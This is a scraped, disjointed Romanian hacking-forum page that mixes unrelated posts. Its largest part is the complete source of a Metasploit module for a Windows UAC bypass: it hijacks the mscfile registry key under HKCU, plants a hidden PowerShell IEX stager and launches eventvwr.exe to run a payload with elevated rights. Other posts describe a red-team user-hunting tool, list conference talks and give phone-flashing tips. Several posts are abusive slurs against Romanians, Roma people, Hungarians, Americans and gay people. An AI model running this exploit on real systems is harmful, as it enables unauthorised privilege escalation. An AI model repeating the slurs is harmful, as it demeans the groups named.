Leaderboard

:))))))))) Iar tu ? vezi ca ROMANUL ala bulangiu a dat teapa rusului. A trimis omul memoriile si nu i-a platit. Exemplu clasic de #romulan. Valori ? #curve, #escroci, #hoti, #manea -> romanian tag cloud

This Metasploit module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::Windows::Priv include Post::Windows::Registry include Post::Windows::Runas EVENTVWR_DEL_KEY = "HKCU\\Software\\Classes\\mscfile" EVENTVWR_WRITE_KEY = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" EXEC_REG_VAL = '' # This maps to "(Default)" EXEC_REG_VAL_TYPE = 'REG_SZ' EVENTVWR_PATH = "%WINDIR%\\System32\\eventvwr.exe" PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" CMD_MAX_LEN = 2081 def initialize(info={}) super(update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)', 'Description' => %q{ This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Nelson', # UAC bypass discovery and research 'Matt Graeber', # UAC bypass discovery and research 'OJ Reeves' # MSF module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/', 'URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1' ] ], 'DisclosureDate'=> 'Aug 15 2016' )) end def check if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 # On x64, check arch if session.arch == ARCH_X86 # running WOW64, map the correct registry view registry_view = REGISTRY_VIEW_64_BIT if target_arch.first == ARCH_X64 # we have an x64 payload specified while using WOW64, so we need to # move over to sysnative commspec = '%WINDIR%\\Sysnative\\cmd.exe' else # Else, we're 32-bit payload, so need to ref wow64. commspec = '%WINDIR%\\SysWOW64\\cmd.exe' end elsif target_arch.first == ARCH_X86 # We're x64, but invoking x86, so switch to SysWOW64 commspec = '%WINDIR%\\SysWOW64\\cmd.exe' end else # if we're on x86, we can't handle x64 payloads if target_arch.first == ARCH_X64 fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') end end # Validate that we can actually do things before we bother # doing any more work check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end payload_value = rand_text_alpha(8) psh_path = expand_path("#{PSH_PATH}") template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" if existing.empty? registry_createkey(EVENTVWR_WRITE_KEY, registry_view) end print_status("Configuring payload and stager registry keys ...") registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # We can't invoke EventVwr.exe directly because CreateProcess fails with the # dreaded 740 error (Program requires elevation). Instead, we must invoke # cmd.exe and use that to fire off the binary. cmd_path = expand_path(commspec) cmd_args = expand_path("/c #{EVENTVWR_PATH}") print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true}) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? Rex::sleep(5) handler(client) print_status("Cleaining up registry keys ...") if existing.empty? registry_deletekey(EVENTVWR_DEL_KEY, registry_view) else registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view) end end def check_permissions! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end print_status('UAC is Enabled, checking level...') if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end Download Source

DELETED

Haha. Ce bine ca pot sa muie anticard si muie Romania. Haha

Pai nu sunt in tara la tine. Poti sta linistit. Si nici ban nu-ti dau. Imi place ca esti troll de prima mana :))) Vezi ca se da ban pe numele mamei. ahahaha

Pai tie iti pot da eu ban. Nu e problema Si fara sa discut cu cineva de asta. Am spus asa ca nu-ti dea altii ban.

La capatul acestui mini challenge va asteapta posibilitatea obtinerii unui loc de munca. Va urez mult succes! 1Decembrie2016.jpg > SHA-1: C0BBBAC269A7C60DB1A3C6916D9DD4C74E9CFA74

Salut! Din cate vad telefonul are procesor mtk, deci softul se scrie cu spflashtool, fara sa fie pornit. softuri gasesti pe google, needrom, etc Daca da vreo eroare legata de bootloader incearca sa-l deblochezi, (in service o sa gasesti un box numit furios > pack 7> fly capitan> unlockbootloader si de acolo te descurci.

Se duce țara dracului cu oameni de ăștia Îi de mers și votat PSD că încă îi destul de aglomerat pe aici.

sa nu-i dati ban, e distractiv omu :))))

Muie Romania. Muie anticard.

Așa e ăștia de au reușit să sară gardul și au dat de apă caldă

O fi gasit shemale man! :)))))

Muie romania. Muie tigani. Muie Zu.

hunter (l)user hunter using WinAPI calls only Introduction: During Red Team engagments it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user (no matter how, always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he is a local administrator in any box, to which groups he belongs, if he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout. You might be thinking, "use Powerview". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware how powerfull PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this. To avoid using multiple old school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the amount of tools uploaded to compromised systems I created a simple tool that doesn't require Administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with white list bypass and process evasion, but I'll leave that for another day. Link: https://github.com/fdiskyou/hunter

BSLV16 BSidesLV 77 videos 446 views Last updated on Nov 17, 2016 Opening Keynote Pt. I & II - Lorrie Cranor-FTC, Michael Kaiser-NCSA by BSidesLV 36:18 Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb by BSidesLV 26:27 Managing Security with the OWASP Assimilation Project - Alan Robertson by BSidesLV 40:17 Toward Better Password Requirements - Jim Fenton by BSidesLV 56:33 Data Science or Data Pseudo-Science? - Ken Westin by BSidesLV 41:51 I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman by BSidesLV 23:33 Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis by BSidesLV 1:28:31 Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari by BSidesLV 29:19 Intro to Storage Security, Looking Past the Server - Jarett Kulm by BSidesLV 24:47 Are You a PenTexter? - Peter Mosmans, Melanie Rieback by BSidesLV 43:41 Deep Adversarial Architectures for Detecting *and Generating) Maliciousness - Hyrum Anderson by BSidesLV 39:09 I Am The Cavalry Panel: Progress on Cyber Safety by BSidesLV 35:50 Welcome to The World of Yesterday, Tomorrow! - Joel Cardella by BSidesLV 46:46 Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson by BSidesLV 49:06 Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis by BSidesLV 55:23 Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It by BSidesLV 23:07 How to Get and Maintain your Compliance without ticking everyone off - Rob Carson by BSidesLV 23:13 What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh by BSidesLV 35:32 Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman by BSidesLV 55:08 State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, BeauWoods by BSidesLV 56:46 State Of Automotive Cyber Safety - IATC - Joshua Corman by BSidesLV 48:53 DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer by BSidesLV 25:44 Defeating Machine Learning: Systemic Deficiencies for Detecting Malware by BSidesLV 45:14 Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage by BSidesLV 46:23 CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman by BSidesLV 47:56 Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats by BSidesLV 52:51 Evaluating a password manager - Evan Johnson by BSidesLV 31:26 Why does everyone want to kill my passwords? - Mark Burnett by BSidesLV 32:11 How to make sure your data science isn't vulnerable to attack - Leila Powell by BSidesLV 57:19 DYODE: Do Your Own DiodE for Industrial Control Systems - AryKokos, Arnaud Soullie by BSidesLV 43:10 Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt by BSidesLV 1:00:45 Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer by BSidesLV 32:23 IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods by BSidesLV 12:44 Mapping the Human Attack Surface - Louis DiValentin (Master Chen) by BSidesLV 26:19 Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor by BSidesLV 29:57 Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter by BSidesLV 47:07 Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone by BSidesLV 39:07 A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland by BSidesLV 23:19 No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh by BSidesLV 52:34 Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett by BSidesLV 26:10 Powershell-Fu - Hunting on the Endpoint - Chris Gerritz by BSidesLV 27:38 Labeling the VirusShare Corpus: Lessons Learned - John Seymour by BSidesLV 30:21 There is no security without privacy - Craig Cunningham by BSidesLV 30:35 Survey says…Making progress in the Vulnerability Disclosure Debate - Allan Friedman by BSidesLV 1:27:38 Domains of Grays - Eric Rand by BSidesLV 38:29 Automated Dorking for Fun and Pr^wSalary - Filip Reesalu by BSidesLV 13:17 [Private Video] You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling by BSidesLV 28:29 Six Degrees of Domain Admin... - Andy Robbins, Will Schroeder, Rohan Vazarkar by BSidesLV 51:51 Uncomfortable Approaches - Joshua Corman, Beau Woods by BSidesLV 45:37 Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay by BSidesLV 26:37 PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven by BSidesLV 16:22 CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers by BSidesLV 41:12 Hacking Megatouch Bartop Games - Mark Baseggio by BSidesLV 34:54 Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation by BSidesLV 58:58 Is that a penguin in my Windows? - Spencer McIntyre by BSidesLV 39:48 Automation Plumbing - Ashley Holtz & Kyle Maxwell by BSidesLV 25:06 Disclosing Passwords Hashing Policies - Michal Spacek by BSidesLV 33:12 PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan by BSidesLV 51:00 Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett by BSidesLV 56:15 An Evolving Era of Botnet Empires - Andrea Scarfo by BSidesLV 28:28 Building an EmPyre with Python - Steve Borosh Alexander Rymdeko-Harvey, Will Schroeder by BSidesLV 50:19 Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs by BSidesLV 22:38 Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff by BSidesLV 47:31 The Deal with Password Alternatives - Terry Gold by BSidesLV 55:15 QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? by BSidesLV 1:04:23 Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology by BSidesLV 31:27 One Compromise to Rule Them All - Bryce Kunz by BSidesLV 53:00 The Future of Bsides - Panel Session by BSidesLV 52:46 What's Up Argon2? The Password Hasing Winner A Year Later - JP Aumasson by BSidesLV 24:59 Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data by BSidesLV 42:58 I Love my BFF (Brute Force Framework) - Kirk Hayes by BSidesLV 24:06 Proactive Password Leak Processing - Bruce Marshall by BSidesLV Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) by BSidesLV 22:21 Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) by BSidesLV 25:20 Pushing Security from the Outside - Kat Sweet, Chris DeWeese by BSidesLV 26:19 Why it's all snake oil - and that may be ok - Andrew Morris by BSidesLV 46:44 Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM

Agenda 1. Introduction (Jason) 2. Compute Architecture Evolution (Jason) 3. Chip Level Architecture (Jason)  Subslices, slices, products 4. Gen Compute Architecture (Maiyuran)  Execution units 5. Instruction Set Architecture (Ken) 6. Memory Sharing Architecture (Jason) 7. Mapping Programming Models to Architecture (Jason) 8. Summary Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf

daily quote: Muie america. Quick facts: 1. Oamenii extradati de Romania in SUA nu au calcat niciodata acolo si totusi Romania, tara pulei de babuini extradeaza fara discutie pe oricine. 2. Daca un american face infractiuni in Romania (s-a intamplat), nu pateste nimeni nimic. 3. Toti din Europa (cu exceptia elvetienilor parca) au nevoie de viza pentru a merge in SUA, timp in care orice cacat cu motz de american se plimba prin Europa fara viza. Si da, muie obama, da-l in pastele ma-sii de tigan.

uite o chestie interesanta pe care poti sa o faci cu lista de email

MUIE unGAYria !

Fac apel la un administrator mai mare.Cine e responsabil pt admini?Sa vedeti cum abuzeaza de drepturile sale si cum a adaugat HOTI la acest topic.Tu esti tradator de prima mana nu eu. Uitati si dovada,dati click aici sa vedeti cum ne face hoti pe toti romani https://rstforums.com/forum/forum/49-discutii-non-it/ Si am salvat si o poza cu imaginea ca sa nu stearga dupa si sa-l dau de gol

Salut , vreau si eu o invitatie te rog.